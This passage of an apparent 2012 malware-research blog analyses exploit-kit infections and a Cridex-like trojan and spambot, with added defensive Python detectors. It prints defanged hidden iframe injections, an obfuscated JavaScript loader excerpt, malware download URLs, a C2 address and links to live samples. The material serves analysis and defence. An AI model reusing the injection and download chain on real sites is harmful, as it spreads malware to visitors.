  +->"C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp.bat" 
And the bat file runs the malware from its new location:
"C:\Documents and Settings\Administrator\Application Data\KB00695911.exe" 
This is explained by the executable's API trace below:
Address: 0x403872 
CreateRemoteThread(hProcess: 0x78, 
lpThreadAttributes: 0x0, 
dwStackSize: 0x0, 
lpStartAddress: 0x3ced50, 
lpParameter: 0x3c0000, 
dwCreationFlags: 0x0, 
lpThreadId: 0x0)
All of a sudden we saw the malicious processes below:
0x2b0 lsass.exe
0x6ec KB00085031.exe
From the previous findings, having studied every malicious act of this binary, we know it is a credential-stealing trojan, a Cridex variant.

Samples downloads

Here is the picture of the captured payloads: We share these samples for research/study purposes --->>[HERE]

VirusTotal detection ratio analysis

@unixfreaxjp ~/malware]$ date
Sun Nov 18 04:38:25 JST 2012

column.php ( 2/44) --> 09b4ceea8fd5e90eea21bc1e2c2892e4
sample.pdf (15/43) --> e2efc2bc128c7aa7643f025a68194a1e  CVE-2009-0927
spn.jar    ( 3/44) --> fbdf22bf32946676dcb1408208a24945  CVE-2012-5076
spn2.jar   ( 3/44) --> e98cde0af1e59379e8aec2a7a813225f  CVE-2012-4681 & CVE-2012-1723
wpbt0.dll  ( 9/43) --> e673b7c943b7395cc9ad61a301652880
spn3.jar   (15/43) --> 66c55d2cebc9d2d7b09a6e12b94fc1c9  CVE-2012-0507 & CVE-2012-4681
t.pdf      (22/43) --> d1e2ff36a6c882b289d3b736d915a6cc  CVE-2009-2990

References of CVE Exploit used

MSFT-MMPC: A technical analysis on new Java vulnerability (CVE-2012-5076) -->[CLICK]
Immunity Products: Java 0day analysis (CVE-2012-4681) -->[CLICK]
EXPLOIT-DB: Adobe Acrobat/Reader Collab getIcon Universal Exploit (CVE-2009-0927) -->[CLICK]
Symantec: An Examination of Java Vulnerability CVE-2012-1723 -->[CLICK]
MSFT-MMPC: The rise of a new Java vulnerability - CVE-2012-1723 -->[CLICK]

Other NEW References of PluginDetect BHEK 0.7.9 (The Non-Obfuscated JavaScript Version)

Sophos: Blackhole confusion. Custom builds or copycats? -->[HERE]
F-Secure: Cool-er Than Blackhole? -->[HERE]
Malware Don't Need Coffee: CVE-2012-5076 - Massively adopted - BHEK update to 2.0.1 -->[HERE]

[NEW!] Additional Info of PluginDetect BHEK 0.7.9 Obfuscated Version

We also detected an obfuscated version of PluginDetect BHEK 0.7.9. The sources are 2 (two) spam attachment HTML files, as per the pics below. *) Thanks to Officer Ken Pryor (@KDPryor) for contributing the samples.

The attached HTML file has code that leads to the obfuscated PluginDetect 0.7.9. Both spams have the same obfuscation code. We can decode this code to find the PluginDetect urls as below. The column.php is the obfuscated version of PluginDetect 0.7.9. It uses a new deobfuscation pattern; we decoded it here -->>[PASTEBIN] ↑with step-by-step text guidance on how to do it.

The components of BHEK2 w/obfuscated PluginDetect 0.7.9 are as usual: ↑these are the samples captured from that host (hamasutra.ru). For research purposes, here are all the samples of this infection -->>[CLICK]

Furthermore, hamasutra.ru has several IPs & DNS records, see --->>[PASTEBIN]; those IPs have a LONG history of BHEK in the past 30 days -->>[PASTEBIN]

In case you are wondering about detection rates (CVE data is as per the list above):
Email attached HTML1 (21/43) fa7b41a96360c09baad5b8fa210e6fae
Email attached HTML2 (11/43) 9d3ce7441ea6cffcc3aeee80238357fe
infector.pdf         (21/43) 2c325f278f741e8b4cfe66af87b96c40  ↑This pdf's decoding guide is here -->>[PASTEBIN]
spn3.jar             (19/41) 66c55d2cebc9d2d7b09a6e12b94fc1c9
spn2.jar             ( 3/43) 4ad0cb8901186409045bf2961f1cad26
spn.jar              ( 3/41) 3eb329162cbf4f1538d7d0f1a23d391c
t.pdf                (21/43) d1e2ff36a6c882b289d3b736d915a6cc
..and the obfuscated PluginDetect 0.7.9 /column.php (4/42) ba76833dc28ad027d0ad148351c9b167

#MalwareMustDie!

Saturday, November 17, 2012

What Serenity Exploit Kit dropped? A Spambot Full Analysis & Samples

We ran into a bunch of urls of the form <domain>/flow08.php, as hinted by our friend @abhinavbom (with thanks!).
These lead us to the infector urls provided by the Serenity Exploit Kit; you can see the explanation of Serenity here --->>[HERE] (Thanks to @Xylit0l). We investigated the malware dropped by these urls, as announced in our twitter below, with the result in a txt report here: -->>[HERE] You can see the details of the investigation in the dropbox url above; we will review only the important points in this blog post.

The infection scheme uses multiple IFRAMEs opened by each front url; for example, flow08.php has about 7 (seven) iframe tags meant to redirect you to the infector, as per the hexed (defanged) code below:
<iframe src="h00p://azbuka007・pro/flow1.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow2.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow3.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow4.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow5.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow6.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow7.php" width="3" height="3" frameborder="0"></iframe>
↑Each IFRAME above redirects you to the infector below↓
h00p://winampgroup.co.uk/k0ff/index.php?s=ag
which contains obfuscated JavaScript, as per the hexed (defanged) excerpt below:
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'               
<script language='Javascript'>eval(function(p,a,c,k,e,d){e=function(c..
\10\\Q\\1e\\R\\Y\\V\\17+/\\U\',J:C(8){7 5=\'\';7 x,v,y;7 w,q,f,s;7 i=0;..
t.J(u)},M:C(e){7 l=\'\';7 i=0;7 c=0,X=0,k=0,E=0;L(i<e.h){c=e.j(i);r(c<1..
oafdhMx|stxoGt|bvvjiiwja|KbGNual|GugimE|FYBSyrEvgcI|GEWtjFCOO|||str|fun..
90170177131203221200143216237189152211217178178164170167130237226190144..
51891601972371881511781951991441822281871871992131991222012311631642372..
13023722618918116517218814817021819915922423817816819016419014418222718..
02237178131203220180140197241163168237218199159224238178168190226199181..
61751562321771901682212211981811982381882011742271981812362381771672021..
16821121718015519022918516724121719919317323518613019121617612219423818..
20168188152186163176193173171185167173225189159165239187201174217200155..
11991811931771611892112211981432022421641302412271891591972381861512292..
u0056W|u0046GHIJKLMN|224|u004fPQR|u0053TU|128|u0065fghij'.split('|'),0,..
</script></body></html>
If you decode this correctly it leads you to the 3 (three) malware file links:
winampgroup.co.uk/files/load/combo.jar
win-amps.eu/k0ff/get.php?f=6
winampgroup.co.uk/files/load/libt.php
When I was fetching these urls, get.php?f=6 was the only one I could fetch (again, see the text report in the dropbox above for the details); it downloads a PE binary file, as below:
$ bitcat get.php

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 F0 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   03 6B 20 3B 47 0A 4E 68 47 0A 4E 68 47 0A 4E 68    .k ;G.NhG.NhG.Nh
0090   42 06 41 68 53 0A 4E 68 42 06 11 68 02 0A 4E 68    B.AhS.NhB..h..Nh
00A0   54 02 13 68 45 0A 4E 68 C4 02 13 68 44 0A 4E 68    T..hE.Nh...hD.Nh
00B0   47 0A 4F 68 0C 0A 4E 68 42 06 2E 68 43 0A 4E 68    G.Oh..NhB..hC.Nh
00C0   AB 01 10 68 46 0A 4E 68 42 06 14 68 46 0A 4E 68    ...hF.NhB..hF.Nh
00D0   52 69 63 68 47 0A 4E 68 00 00 00 00 00 00 00 00    RichG.Nh........
00E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00F0   50 45 00 00 4C 01 04 00 6D 1C A5 50 00 00 00 00    PE..L...m..P....
0100   00 00 00 00 E0 00 0F 01 0B 01 07 0A 00 50 00 00    .............P..

PE Image Base : 0x400000
Entry Point: 0x1186
Compile Time: 0x50A51C6D [Thu Nov 15 16:46:37 2012 UTC]
CRC Fail! Claimed: 47607, Actual:  197000
Packer: Armadillo v2.xx (CopyMem II) - additional
Compiler: Microsoft Visual C++ 7.0 MFC
// ↑Traces...
// push    12010h
// push    offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
// push    esi

Sections:
   .text 0x1000 0x4da4 20480
   .rdata 0x6000 0x16de 8192
   .data 0x8000 0x1258 4096
   .rsrc 0xa000 0x1f0 4096  <==== packed
We quickly checked for threat information about this file and found ourselves disappointed by the unsatisfactory result:
File get.php with MD5 268bece218187c189c2322d6f7d21efb :
DrWeb                    : Trojan.Spambot.11176
Symantec                 : WS.Reputation.1
Kaspersky                : UDS:DangerousObject.Multi.Generic
So, with a bit of reversing skill, we decided to dissect this malware file ourselves, which turned up the many malicious traces below..... (again, see the text report in the dropbox above for the details)

Binary Analysis

It looks packed with Armadillo (see the comment below for this detection/judgement). Traces of crypter usage are also detected in the binary. So, for better analysis, be sure to unpack it first. @Xylit0l was kind enough to provide a video of manual analysis and unpacking with OllyDbg + PUPE below (enlarge it to see the details). After reversing some of the code you'll find the dangerous operations below:
push    offset PathName ; lpFilename
push    0               ; lpModuleName
call    ds:GetModuleHandleA
push    eax             ; hModule
call    ds:GetModuleFileNameA
push    1036640h        ; dwBytes
push    0               ; dwFlags
   :
LPSTR GetCommandLineA(void)
     extrn GetCommandLineA:dword ; DATA XREF: start:loc_40128B
   :
.idata:00406038 ; BOOL __stdcall 
                 WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,
                 LPOVERLAPPED lpOverlapped)
.idata:00406038  extrn WriteFile:dword   ; DATA XREF: __NMSG_WRITE+155
   :
; Microsoft VisualC 2-8/net runtime
; Attributes: library function
unknown_libname_1 proc near
arg_0= dword ptr  4
push    offset ModuleName ; "mscoree.dll"
call    ds:GetModuleHandleA
test    eax, eax
jz      short loc_401380
It was enough to tell us that it writes files, executes foreign code, and shows serious internet activity.

Behavior analysis

The next step is to test it, which we did as per the steps below.. We just ran it... The sample deleted itself, saved a copy to a different location, and ran an evil SVCHOST: Well, let's see what this SVCHOST does by monitoring its activity. Windows Task Manager provided enough facilities for this purpose: ↑you can see so many SMTP connections made by this binary. Then what exactly do these SMTP connections do? What malicious act? We captured everything with Regshot, Wireshark & a memory dump inside the test PC, and outside the box with tcpdump, to study this malware's malicious acts.

What's the malware's malicious file operation?

The malware file deletes itself & moves itself to here:
C:\Documents and Settings\rik\jjsrdpce.exe
Drops some temp files here:
C:\DOCUME~1\...\LOCALS~1\Temp\0706.bat
C:\DOCUME~1\...\LOCALS~1\Temp\3366.bat
C:\DOCUME~1\...\LOCALS~1\Temp\8160.bat
C:\DOCUME~1\...\LOCALS~1\Temp\6783.bat
C:\DOCUME~1\...\LOCALS~1\Temp\7686.bat
C:\DOCUME~1\...\LOCALS~1\Temp\1438.bat

What did this binary do in the registry?

A malware autorun entry is registered as below:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\
Software\Microsoft\Windows\CurrentVersion\Run\MSConfig: 
""C:\Documents and Settings\rik\jjsrdpce.exe""
A huge blob of ASCII-encoded binary data was saved in the registry at the record below (dump omitted)...
HKLM\SOFTWARE\Microsoft\DeviceControl\DevData: C3 6A 05 ..

What networking / what kind of spam activities?

The malware grabs your IP & gateway hostname by reverse-resolving your IP's in-addr.arpa record, and then asks for every possible mail-server name (smtp., mail., MX) of every possible parent domain of that hostname:
24  256.711421  TestPC  8.8.8.8  DNS  Standard query PTR 105.83.110.xxx.in-addr.arpa
25  256.850845  8.8.8.8  TestPC  DNS  Standard query response PTR p6e5369.sitmnt01.ap.MyDomain
429  270.887803  TestPC  8.8.8.8  DNS  Standard query A smtp.p6e5369.sitmnt01.ap.MyDomain
431  270.966472  TestPC  8.8.8.8  DNS  Standard query A mail.p6e5369.sitmnt01.ap.MyDomain
435  271.254438  TestPC  8.8.8.8  DNS  Standard query A sitmnt01.ap.MyDomain
437  271.332410  TestPC  8.8.8.8  DNS  Standard query A smtp.sitmnt01.ap.MyDomain
439  271.410546  TestPC  8.8.8.8  DNS  Standard query A mail.sitmnt01.ap.MyDomain
441  271.489836  TestPC  8.8.8.8  DNS  Standard query MX sitmnt01.ap.MyDomain
443  271.571450  TestPC  8.8.8.8  DNS  Standard query A ap.MyDomain
451  273.886911  TestPC  8.8.8.8  DNS  Standard query A smtp.ap.MyDomain
453  273.974856  TestPC  8.8.8.8  DNS  Standard query A mail.ap.MyDomain
455  274.052129  TestPC  8.8.8.8  DNS  Standard query MX ap.MyDomain
456  274.148586  8.8.8.8 TestPC  DNS  Standard query response MX 100 mailgate.MyDomain
457  274.149148  TestPC  8.8.8.8  DNS  Standard query A mailgate.MyDomain
Then it searched for the MX info of microsoft.com, yahoo.com, google.com & mail.ru.
000002B0  e2 68 01 00 00 01 00 00  00 00 00 00 09 6d 69 63 .h...... .....mic
000002C0  72 6f 73 6f 66 74 03 63  6f 6d 00 00 0f 00 01    rosoft.c om.....

000002CF  61 15 01 00 00 01 00 00  00 00 00 00 04 6d 61 69 a....... .....mai
000002DF  6c 09 6d 65 73 73 61 67  69 6e 67 09 6d 69 63 72 l.messag ing.micr
000002EF  6f 73 6f 66 74 03 63 6f  6d 00 00 01 00 01       osoft.co m.....

00000329  78 9f 01 00 00 01 00 00  00 00 00 00 05 79 61 68 x....... .....yah
00000339  6f 6f 03 63 6f 6d 00 00  0f 00 01                oo.com.. ...

00000344  fb ec 01 00 00 01 00 00  00 00 00 00 04 6d 74 61 ........ .....mta
00000354  37 03 61 6d 30 08 79 61  68 6f 6f 64 6e 73 03 6e 7.am0.ya hoodns.n
00000364  65 74 00 00 01 00 01                             et.....

00000398  33 17 01 00 00 01 00 00  00 00 00 00 06 67 6f 6f 3....... .....goo
000003A8  67 6c 65 03 63 6f 6d 00  00 0f 00 01             gle.com. ....

000003B4  a4 49 01 00 00 01 00 00  00 00 00 00 05 61 73 70 .I...... .....asp
000003C4  6d 78 01 6c 06 67 6f 6f  67 6c 65 03 63 6f 6d 00 mx.l.goo gle.com.
000003D4  00 01 00 01 

0000045C  2a 50 01 00 00 01 00 00  00 00 00 00 04 6d 61 69 *P...... .....mai
0000046C  6c 02 72 75 00 00 0f 00  01                      l.ru.... .

00000475  fd 90 01 00 00 01 00 00  00 00 00 00 03 6d 78 73 ........ .....mxs
00000485  04 6d 61 69 6c 02 72 75  00 00 01 00 01          .mail.ru .....
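As an added example (not from the original post), here is a small Python checker that applies the two behaviours described above to DNS log lines: a PTR answer for the host's own address followed by smtp./mail./MX probes walking up every parent domain of that name, plus MX lookups of the big mail providers. The sample lines are constructed to mirror the Wireshark capture above, and the thresholds are my own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the Wireshark capture in the post
# (frame, time, src, dst, proto, info); the names are the ones seen there.
SAMPLE_LOG = """\
24  256.711421  TestPC  8.8.8.8  DNS  Standard query PTR 105.83.110.xxx.in-addr.arpa
25  256.850845  8.8.8.8  TestPC  DNS  Standard query response PTR p6e5369.sitmnt01.ap.MyDomain
429  270.887803  TestPC  8.8.8.8  DNS  Standard query A smtp.p6e5369.sitmnt01.ap.MyDomain
431  270.966472  TestPC  8.8.8.8  DNS  Standard query A mail.p6e5369.sitmnt01.ap.MyDomain
435  271.254438  TestPC  8.8.8.8  DNS  Standard query A sitmnt01.ap.MyDomain
437  271.332410  TestPC  8.8.8.8  DNS  Standard query A smtp.sitmnt01.ap.MyDomain
439  271.410546  TestPC  8.8.8.8  DNS  Standard query A mail.sitmnt01.ap.MyDomain
441  271.489836  TestPC  8.8.8.8  DNS  Standard query MX sitmnt01.ap.MyDomain
443  271.571450  TestPC  8.8.8.8  DNS  Standard query A ap.MyDomain
451  273.886911  TestPC  8.8.8.8  DNS  Standard query A smtp.ap.MyDomain
453  273.974856  TestPC  8.8.8.8  DNS  Standard query A mail.ap.MyDomain
455  274.052129  TestPC  8.8.8.8  DNS  Standard query MX ap.MyDomain
456  274.148586  8.8.8.8  TestPC  DNS  Standard query response MX 100 mailgate.MyDomain
457  274.149148  TestPC  8.8.8.8  DNS  Standard query A mailgate.MyDomain
460  275.100000  TestPC  8.8.8.8  DNS  Standard query MX microsoft.com
461  275.200000  TestPC  8.8.8.8  DNS  Standard query MX yahoo.com
462  275.300000  TestPC  8.8.8.8  DNS  Standard query MX google.com
463  275.400000  TestPC  8.8.8.8  DNS  Standard query MX mail.ru
"""

# One Wireshark-style "Standard query" line; the optional number before the
# name is the MX preference that appears in MX responses.
LINE_RE = re.compile(
    r"^\s*\d+\s+[\d.]+\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+DNS\s+"
    r"Standard query(?P<resp> response)?\s+(?P<type>PTR|A|MX)\s+"
    r"(?:\d+\s+)?(?P<name>\S+)"
)

# Providers whose MX records the spambot asked for (from the post).
PROVIDER_MX = {"microsoft.com", "yahoo.com", "google.com", "mail.ru"}


def parse(log):
    """Yield (src, is_response, qtype, name) for every line that matches."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["src"], bool(m["resp"]), m["type"], m["name"].lower()


def parent_domains(name):
    """'a.b.c.d' -> ['a.b.c.d', 'b.c.d', 'c.d'] (stops before the bare TLD)."""
    labels = name.split(".")
    return [".".join(labels[i:]) for i in range(len(labels) - 1)]


def analyze(log, min_levels=2, min_providers=2):
    """Score the log: how many parent domains of the PTR answer were probed
    with at least two of {smtp., mail., MX}, and how many provider MX
    lookups were made. Thresholds are assumptions, not from the post."""
    own_names = [n for _, resp, t, n in parse(log) if resp and t == "PTR"]
    probes = defaultdict(set)   # parent domain -> subset of {"smtp","mail","MX"}
    provider_mx = set()
    for _, resp, t, n in parse(log):
        if resp:
            continue
        if t == "MX" and n in PROVIDER_MX:
            provider_mx.add(n)
        for own in own_names:
            for suffix in parent_domains(own):
                if t == "MX" and n == suffix:
                    probes[suffix].add("MX")
                elif t == "A" and n in (f"smtp.{suffix}", f"mail.{suffix}"):
                    probes[suffix].add(n.split(".", 1)[0])
    walked = sorted(s for s, kinds in probes.items() if len(kinds) >= 2)
    return {
        "own_names": own_names,
        "walked_suffixes": walked,
        "provider_mx": sorted(provider_mx),
        "spambot_like": len(walked) >= min_levels
        and len(provider_mx) >= min_providers,
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the sample the checker reports all three parent domains of the PTR answer as walked and all four provider MX lookups, so it flags the host as spambot-like.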
In addition, it resolved and tried to connect to "static.203.81.40.188.clients.your-server.de" (the PTR answer for 188.40.81.203, seen in the dump below):
000008FA  80 a5 81 80 00 01 00 01  00 00 00 00 03 32 30 33 ........ .....203
0000090A  02 38 31 02 34 30 03 31  38 38 07 69 6e 2d 61 64 .81.40.1 88.in-ad
0000091A  64 72 04 61 72 70 61 00  00 0c 00 01 c0 0c 00 0c dr.arpa. ........
0000092A  00 01 00 00 a8 be 00 2d  06 73 74 61 74 69 63 03 .......- .static.
0000093A  32 30 33 02 38 31 02 34  30 03 31 38 38 07 63 6c 203.81.4 0.188.cl
0000094A  69 65 6e 74 73 0b 79 6f  75 72 2d 73 65 72 76 65 ients.yo ur-serve
0000095A  72 02 64 65 00                                   r.de.
0000095F  80 a5 81 80 00 01 00 01  00 00 00 00 03 32 30 33 ........ .....203
0000096F  02 38 31 02 34 30 03 31  38 38 07 69 6e 2d 61 64 .81.40.1 88.in-ad
0000097F  64 72 04 61 72 70 61 00  00 0c 00 01 c0 0c 00 0c dr.arpa. ........
0000098F  00 01 00 00 a8 bc 00 2d  06 73 74 61 74 69 63 03 .......- .static.
0000099F  32 30 33 02 38 31 02 34  30 03 31 38 38 07 63 6c 203.81.4 0.188.cl
000009AF  69 65 6e 74 73 0b 79 6f  75 72 2d 73 65 72 76 65 ients.yo ur-serve
000009BF  72 02 64 65 00                                   r.de.
Next, it establishes a connection to 188.40.81.203 on TCP/2053 (remote-as); the stream itself is opaque (dump omitted):
Test PC←→188.40.81.203 via TCP/2053(remote-as) ⇒36063 Seq=142 Ack=258 Win=16687 Len=1412
IF the connection is established, it makes you download ANOTHER malicious binary:
// Another malware is sent via the TCP stream below.....
    0000013A  35 e1 7f 2a 6a 33 77 11  b1 e7 4d ef a4 f6 5a c6 5..*j3w. ..M...Z. <==== See this? A PE file...
    0000014A  be 63 df 65 e1 90 f6 f1  8d 3b 77 78 a0 89 32 3f .c.e.... .;wx..2?
    0000015A  30 ac 69 20 82 8f ef d2  32 2e 99 49 50 f8 61 93 0.i .... 2..IP.a.
    0000016A  56 36 ba b5 49 dd db 69  28 65 c5 57 91 f1 20 d6 V6..I..i (e.W.. .
    0000017A  33 13 f0 01 b4 39 0c 6e  5a 65 90 b7 5d 6b 80 92 3....9.n Ze..]k..
    0000018A  ac bf 12 05 fd 1f df f6  6e 30 58 d5 dd 0f 26 89 ........ n0X...&.
    0000019A  57 46 6e a3 85 d0 d1 d2  b9 ca 29 f5 85 34 89 d8 WFn..... ..)..4..
    000001AA  2b dd 6e e7 42 95 1e 10  96 f9 9f eb 7c 32 ee 64 +.n.B... ....|2.d
    000001BA  92 04 d3 0a d2 cc ba 15  25 6c 1b 4e 3a 3e ea 3f ........ %l.N:>.?
    000001CA  9c 6e 3c 7c 30 d5 fb 5e  aa 90 41 be 6f ad 23 c0 .n<|0..^ ..A.o.#.
    000001DA  b9 51 1e d6 0f e3 71 00  c4 e4 60 e6 d4 9e be bb .Q....q. ..`.....
    000001EA  66 fc 29 d9 d7 35 0a 13  f8 8c 3d e4 6b a1 0d 32 f.)..5.. ..=.k..2
    000001FA  8d 12 6b 85 2f 07 f5 bf  c4 a8 24 7a 4b 83 f0 0c ..k./... ..$zK...
    0000020A  7f 0a 5d ac 3a 8b 9a bf  eb 69 b5 4f 50 d1 e1 09 ..].:... .i.OP...
    0000021A  53 a4 c4 7e 84 03 aa 88  d0 41 e5 3a af d9 3d 79 S..~.... .A.:..=y
    0000022A  e3 58 e6 a5 a6 ff ed af  4b 75 86 7f b1 ce 63 f6 .X...... Ku....c.
    0000023A  75 8b 65 39 34 47 18 97  fa ff 95 f9 b2 89 20 b5 u.e94G.. ...... .
    0000024A  a4 e8 d4 e5 a6 77 b2 dd  15 61 c7 3b 0a f5 6f 3a .....w.. .a.;..o:
    0000025A  40 87 8f 9c d9 39 f6 97  36 6d 5a 6e 6d 03 49 de @....9.. 6mZnm.I.
    0000026A  b5 f2 ae 5f 18 eb 9d 66  ee 5f e0 2f 10 90 d1 fd ..._...f ._./....
    0000027A  b5 68 e1 36 e6 5b ba 3d  50 57 d6 c7 7e a8 96 e6 .h.6.[.= PW..~...
       :                :                       :                    :
    000511DD  f8 dc 2c bf c6 fe d4 42  40 ed 52 2f af 4c d3 b2 ..,....B @.R/.L..
    000511ED  52 46 02 49 ce d1 5d 62  27 85 a8 a6 a5 10 d6 aa RF.I..]b '.......
    000511FD  1f 6a b9 cf 3b 0d 1f e5  61 cb c7 d9 8e a8 ca 75 .j..;... a......u
    0005120D  11 86 64 6b 65 f5 23 e0  65 9e 03 18 e2 43 12 ec ..dke.#. e....C..
    0005121D  80 4c ca ad 88 78 c7 b1  7c 1a 33 44 77 fc a1 e1 .L...x.. |.3Dw...
    0005122D  5f 2a ad 14 0c a3 73 80  77 e1 e8 46 f8 7c 42 ae _*....s. w..F.|B.
    0005123D  35 5d 33 d5 19 23 fd 01  d3 fe                   5]3..#.. ..
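To rebuild both directions of a "Follow TCP Stream" dump like the one above and confirm that a reply really carries an executable (rather than eyeballing the bytes), here is an added Python example. It is my own code, not the blog's tooling or any MalwareMustDie script. It assumes the Wireshark layout used above (one direction unindented, the other indented, offsets restarting per direction, hex columns followed by an ASCII column) and uses a small constructed HTTP exchange with a minimal MZ/PE stub as sample input, not the real dump from the page.

```python
import re
import struct
from typing import Dict, List, Tuple

# Constructed sample in Wireshark "Follow TCP Stream" hex-dump style (not the page's dump).
# Unindented lines: client request. Indented lines: server reply carrying a tiny MZ/PE stub
# whose e_lfanew (offset 0x3c from 'MZ') points at 'PE\0\0' 0x40 bytes further on.
SAMPLE_DUMP = """\
00000000  47 45 54 20 2f 66 6f 72  75 6d 2f 77 2e 70 68 70 GET /for um/w.php
00000010  20 48 54 54 50 2f 31 2e  31 0d 0a 0d 0a           HTTP/1. 1....
    00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
    00000010  0a 0d 0a 4d 5a 90 00 03  00 00 00 04 00 00 00 ff ...MZ... ........
    00000020  ff 00 00 b8 00 00 00 00  00 00 00 40 00 00 00 00 ........ ...@....
    00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
    00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 40 ........ .......@
    00000050  00 00 00 50 45 00 00 4c  01 03 00 00 00 00 00 00 ...PE..L ........
"""

_LINE_RE = re.compile(r"^(\s*)([0-9A-Fa-f]{8})\s+(.*)$")
_HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")


def parse_follow_dump(text: str) -> Dict[str, bytearray]:
    """Rebuild the two directions of a Follow-TCP-Stream hex dump.

    Unindented lines are one direction, indented lines the other (in the dump on this
    page the indented side is the server's reply).  Offsets restart per direction, so
    each side is accumulated into its own buffer.  Lines that are not hex-dump lines
    (':' elision markers, annotations) are skipped; a gap in offsets is zero-padded so
    later offsets still line up with what the dump shows.
    """
    streams = {"unindented": bytearray(), "indented": bytearray()}
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        indent, offset, rest = m.groups()
        side = "indented" if indent else "unindented"
        # Take at most 16 two-digit hex tokens; the ASCII column that follows is
        # ignored (it is stopped at by the first non-hex token).
        data = bytearray()
        for tok in rest.split():
            if len(data) == 16 or not _HEX_PAIR.match(tok):
                break
            data.append(int(tok, 16))
        off = int(offset, 16)
        buf = streams[side]
        if off > len(buf):
            buf.extend(b"\x00" * (off - len(buf)))
        buf.extend(data)
    return streams


def find_pe_headers(streams: Dict[str, bytearray]) -> List[Tuple[str, int, int, int]]:
    """Locate MZ/PE images inside the reconstructed payloads.

    Returns (direction, offset_of_MZ, machine, number_of_sections) for every 'MZ' whose
    e_lfanew points at a valid 'PE\\0\\0' signature, so a stray 'MZ' in text is not
    reported.
    """
    hits = []
    for side, buf in streams.items():
        pos = buf.find(b"MZ")
        while pos != -1:
            if pos + 0x40 <= len(buf):
                (e_lfanew,) = struct.unpack_from("<I", buf, pos + 0x3C)
                pe = pos + e_lfanew
                if pe + 8 <= len(buf) and buf[pe:pe + 4] == b"PE\x00\x00":
                    machine, nsections = struct.unpack_from("<HH", buf, pe + 4)
                    hits.append((side, pos, machine, nsections))
            pos = buf.find(b"MZ", pos + 1)
    return hits


if __name__ == "__main__":
    streams = parse_follow_dump(SAMPLE_DUMP)
    for side, buf in streams.items():
        print(f"{side}: {len(buf)} bytes")
    for side, off, machine, nsec in find_pe_headers(streams):
        print(f"PE image in {side} stream at offset 0x{off:x}: "
              f"machine=0x{machine:x}, sections={nsec}")
```

Pasting the page's own dump into `SAMPLE_DUMP` works the same way; the elided region (the `:` line) simply becomes a zero-filled gap, so the reported offsets still match the dump.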
The binary also makes the infected host communicate with 188.40.81.203 over the SMTP protocol:
// Attempt to establish the SMTP connection from 188.40.81.203 to the infected PC
422   269.987058 188.40.81.203 TestPC TCPsmtp > neod1 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
0000  00 a0 c9 22 b0 ee 00 12  f0 e9 3e 3e 08 00 45 00   ...".... ..>>..E.
0010  00 30 23 30 40 00 80 06  e1 c3 c0 a8 07 54 da 6e   .0#0@... .....T.n
0020  53 69 04 17 00 19 20 e7  9f e9 00 00 00 00 70 02   Si.... . ......p.
0030  40 00 88 4a 00 00 02 04  05 b4 01 01 04 02         @..J.... ......  
The picture of the PCAP analysis (click to enlarge): the PCAP data can be downloaded from the link provided at the bottom of this page :-) ↑If you look at all of the captured network traffic mentioned above, you'll know that this malware is positively a spambot. But not only that: it also tried to access your PC via TCP/1053, a remote protocol used for remote control, and as a bonus it sends you additional malicious code. In practice it uses your PC as a remote spam relay: the spam emails are relayed through your nearest mail server if one exists, or through other mail servers. Evil enough, isn't it? (again, see the text report in the Dropbox URL above for the details)
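The two behaviours described above (an ordinary workstation fanning out SMTP connections to many distinct servers, and an external host connecting in to TCP/1053) are easy to spot in flow data once you look for them. The following is an added Python example of my own, not code from the blog or the PCAP's text report; it assumes simple whitespace-separated flow records (timestamp, src, sport, dst, dport, proto), an internal address range of 192.168.0.0/16 and 10.0.0.0/8, and an assumed allowlist of legitimate mail servers. The records are constructed for the example; the only address taken from the write-up is 188.40.81.203, the rest are documentation ranges.

```python
import ipaddress
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed flow records (not the page's PCAP): ts src sport dst dport proto.
# 192.168.7.84 plays the infected PC; 192.168.7.25 plays the site's real mail server.
SAMPLE_FLOWS = """\
1353085200.10 192.168.7.84 1047 203.0.113.10 25 tcp
1353085200.35 192.168.7.84 1048 203.0.113.11 25 tcp
1353085200.61 192.168.7.84 1049 198.51.100.7 25 tcp
1353085200.90 192.168.7.84 1050 198.51.100.8 25 tcp
1353085201.12 192.168.7.84 1051 188.40.81.203 25 tcp
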